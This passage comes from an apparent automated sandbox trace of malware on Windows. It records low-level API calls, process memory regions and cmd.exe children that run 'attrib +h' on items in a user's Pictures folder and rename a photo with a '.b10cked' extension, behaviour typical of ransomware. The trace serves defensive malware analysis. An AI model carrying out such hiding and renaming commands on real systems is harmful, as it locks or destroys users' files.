lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, 
lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.469] _close (_FileHandle=4) returned 0 [0145.470] FindNextFileW (in: hFindFile=0x340820, lpFindFileData=0x18f440 | out: lpFindFileData=0x18f440) returned 0 [0145.470] GetLastError () returned 0x12 [0145.470] FindClose (in: hFindFile=0x340820 | out: hFindFile=0x340820) returned 1 [0145.471] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0145.478] _close (_FileHandle=3) returned 0 [0145.478] GetConsoleTitleW (in: lpConsoleTitle=0x18f878, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.479] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.479] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0145.479] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.479] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0xffffffff [0145.479] GetLastError () returned 0x2 [0145.479] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0xffffffff [0145.479] GetLastError () returned 0x2 [0145.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0x340820 [0145.479] FindClose (in: hFindFile=0x340820 | out: hFindFile=0x340820) returned 1 [0145.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0xffffffff [0145.480] GetLastError () returned 0x2 [0145.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0x340820 [0145.480] FindClose (in: hFindFile=0x340820 | out: hFindFile=0x340820) returned 1 [0145.480] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0145.480] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0145.480] GetConsoleTitleW (in: lpConsoleTitle=0x18f60c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.480] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f494, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f55c | out: lpAttributeList=0x18f494, lpSize=0x18f55c) returned 1 [0145.480] UpdateProcThreadAttribute (in: lpAttributeList=0x18f494, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f554, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f494, lpPreviousValue=0x0) returned 1 [0145.480] GetStartupInfoW (in: lpStartupInfo=0x18f450 | out: lpStartupInfo=0x18f450*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0145.480] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0145.480] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f4f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f53c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" ", lpProcessInformation=0x18f53c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb4c, dwThreadId=0x990)) returned 1 [0145.482] CloseHandle (hObject=0x50) returned 1 [0145.482] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0145.482] GetEnvironmentStringsW () returned 0x342d20* [0145.482] FreeEnvironmentStringsW (penv=0x342d20) returned 1 [0145.483] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0145.557] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x18f430 | out: lpExitCode=0x18f430*=0x0) returned 1 [0145.557] CloseHandle (hObject=0x4c) returned 1 [0145.557] _vsnwprintf (in: _Buffer=0x18f578, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f43c | out: _Buffer="00000000") returned 8 [0145.557] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 
1 [0145.557] GetEnvironmentStringsW () returned 0x342d20* [0145.558] FreeEnvironmentStringsW (penv=0x342d20) returned 1 [0145.558] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0145.558] GetEnvironmentStringsW () returned 0x342d20* [0145.558] FreeEnvironmentStringsW (penv=0x342d20) returned 1 [0145.558] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f494 | out: lpAttributeList=0x18f494) [0145.558] GetConsoleTitleW (in: lpConsoleTitle=0x18f878, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.558] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.558] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0145.558] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.558] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0xffffffff [0145.558] GetLastError () returned 0x2 [0145.558] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0xffffffff [0145.559] GetLastError () returned 0x2 [0145.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0x340820 [0145.559] FindClose (in: hFindFile=0x340820 | out: hFindFile=0x340820) returned 1 [0145.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", 
fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0xffffffff [0145.559] GetLastError () returned 0x2 [0145.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0x340820 [0145.559] FindClose (in: hFindFile=0x340820 | out: hFindFile=0x340820) returned 1 [0145.559] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0145.559] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0145.559] GetConsoleTitleW (in: lpConsoleTitle=0x18f60c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.559] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f494, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f55c | out: lpAttributeList=0x18f494, lpSize=0x18f55c) returned 1 [0145.559] UpdateProcThreadAttribute (in: lpAttributeList=0x18f494, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f554, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f494, lpPreviousValue=0x0) returned 1 [0145.559] GetStartupInfoW (in: lpStartupInfo=0x18f450 | out: lpStartupInfo=0x18f450*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0145.559] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0145.559] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, 
lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f4f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f53c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"", lpProcessInformation=0x18f53c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xad0, dwThreadId=0x988)) returned 1 [0145.561] CloseHandle (hObject=0x4c) returned 1 [0145.561] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0145.561] GetEnvironmentStringsW () returned 0x343760* [0145.561] FreeEnvironmentStringsW (penv=0x343760) returned 1 [0145.561] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0145.777] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f430 | out: lpExitCode=0x18f430*=0x0) returned 1 [0145.777] CloseHandle (hObject=0x50) returned 1 [0145.777] _vsnwprintf (in: _Buffer=0x18f578, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f43c | out: _Buffer="00000000") returned 8 [0145.777] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0145.777] GetEnvironmentStringsW () returned 0x343760* [0145.777] FreeEnvironmentStringsW (penv=0x343760) returned 1 [0145.777] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0145.777] GetEnvironmentStringsW () returned 0x343760* [0145.777] FreeEnvironmentStringsW (penv=0x343760) returned 1 [0145.777] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f494 | out: lpAttributeList=0x18f494) [0145.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.777] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0145.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.777] GetConsoleMode (in: hConsoleHandle=0x7, 
lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0145.778] _get_osfhandle (_FileHandle=0) returned 0x3 [0145.778] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0145.778] SetConsoleInputExeNameW () returned 0x1 [0145.778] GetConsoleOutputCP () returned 0x1b5 [0145.778] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0145.778] SetThreadUILanguage (LangId=0x0) returned 0x409 [0145.778] exit (_Code=0) Process: id = "198" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0x9c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17180 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17181 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17182 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17183 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" 
filename = "" Region: id = 17184 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17185 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17186 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17187 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17188 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 17189 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17292 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17293 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17294 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17295 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 17296 start_va = 0x760000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 
17297 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17298 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17299 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17300 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17301 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17302 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17303 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17304 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17305 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17306 start_va 
= 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17307 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17308 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17309 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 17310 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 17311 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 17312 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 17313 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 17314 start_va = 0x5a0000 end_va = 0x702fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 17315 start_va = 0x770000 end_va = 0x136ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Thread: id = 253 os_tid = 0x9b8 [0144.945] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fb5c | out: lpSystemTimeAsFileTime=0x30fb5c*(dwLowDateTime=0x90533d60, dwHighDateTime=0x1d440a9)) [0144.945] GetCurrentProcessId () returned 0x9c0 [0144.945] GetCurrentThreadId () returned 0x9b8 [0144.945] GetTickCount () returned 0x2d316 [0144.945] 
QueryPerformanceCounter (in: lpPerformanceCount=0x30fb54 | out: lpPerformanceCount=0x30fb54*=20173391033) returned 1 [0144.945] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0144.945] __set_app_type (_Type=0x1) [0144.945] __p__fmode () returned 0x76b331f4 [0144.945] __p__commode () returned 0x76b331fc [0144.945] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0144.946] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0144.946] GetCurrentThreadId () returned 0x9b8 [0144.946] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b8) returned 0x38 [0144.946] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.946] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0144.946] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.946] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0144.946] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30faec | out: phkResult=0x30faec*=0x0) returned 0x2 [0144.946] VirtualQuery (in: lpAddress=0x30fb23, lpBuffer=0x30fabc, dwLength=0x1c | out: lpBuffer=0x30fabc*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.946] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fabc, dwLength=0x1c | out: lpBuffer=0x30fabc*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0144.946] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fabc, dwLength=0x1c | out: lpBuffer=0x30fabc*(BaseAddress=0x211000, AllocationBase=0x210000, 
